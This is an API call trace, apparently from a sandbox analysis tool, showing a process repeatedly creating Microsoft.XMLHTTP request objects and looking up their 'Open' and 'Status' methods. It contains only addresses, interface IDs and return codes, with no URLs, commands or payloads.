	[0243.110] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0243.110] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0243.110] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0243.111] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0243.111] SysStringLen (param_1=0x0) returned 0x0
	[0243.111] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0243.111] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0243.111] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0243.111] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0243.111] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0243.111] ??2@YAPEAX_K@Z () returned 0x62f310
	[0243.111] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f310) 
	[0243.111] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0243.112] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0243.112] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0243.112] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0243.112] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0243.112] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0243.114] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0243.114] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0243.114] SysStringLen (param_1=0x0) returned 0x0
	[0243.114] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0243.114] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0243.114] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0243.114] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0243.114] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0243.114] ??2@YAPEAX_K@Z () returned 0x62f330
	[0243.114] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0243.114] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0243.114] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0243.114] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0243.114] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0243.115] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0243.115] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0243.115] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0243.115] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0243.115] SysStringLen (param_1=0x0) returned 0x0
	[0243.115] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0243.115] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0243.115] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c50) returned 0x0
	[0243.115] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0243.115] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0243.115] ??2@YAPEAX_K@Z () returned 0x62f310
	[0243.115] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0243.115] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0243.115] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0243.115] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c50) returned 0x0
	[0243.115] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c50) returned 0x3
	[0243.115] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0243.115] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0243.115] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0243.116] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0243.116] SysStringLen (param_1=0x0) returned 0x0
	[0243.116] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0243.116] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0243.116] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0243.116] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0243.116] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72a8) returned 0x0
	[0243.116] ??2@YAPEAX_K@Z () returned 0x62f330
	[0243.116] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72a8, pUnkSite=0x62f330) 
	[0243.116] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0243.116] XMLHTTPRequest:IUnknown:Release (This=0x49c72a8) returned 0x0
	[0243.116] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0243.116] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0243.116] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0243.116] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0243.116] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0243.116] longjmp () 
	[0243.116] longjmp () 
	[0243.116] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0243.116] SysStringLen (param_1=0x0) returned 0x0
	[0243.116] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0243.117] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0243.117] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7340) returned 0x0
	[0243.117] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0243.117] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7340, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0243.117] ??2@YAPEAX_K@Z () returned 0x62f310
	[0243.117] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f310) 
	[0243.117] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0243.117] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0243.117] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7340, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7340) returned 0x0
	[0243.117] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7340) returned 0x3
	[0243.117] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7340, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0243.117] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7340, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0243.117] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7340, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0243.117] longjmp () 
	[0243.117] longjmp () 
	[0243.117] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0243.117] SysStringLen (param_1=0x0) returned 0x0
	[0243.118] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0243.118] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0243.118] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c50) returned 0x0
	[0243.118] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0243.118] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0243.118] ??2@YAPEAX_K@Z () returned 0x62f330
	[0243.118] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0243.118] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0243.118] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0243.118] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c50) returned 0x0
	[0243.118] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c50) returned 0x3
	[0243.118] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0243.118] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0243.118] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
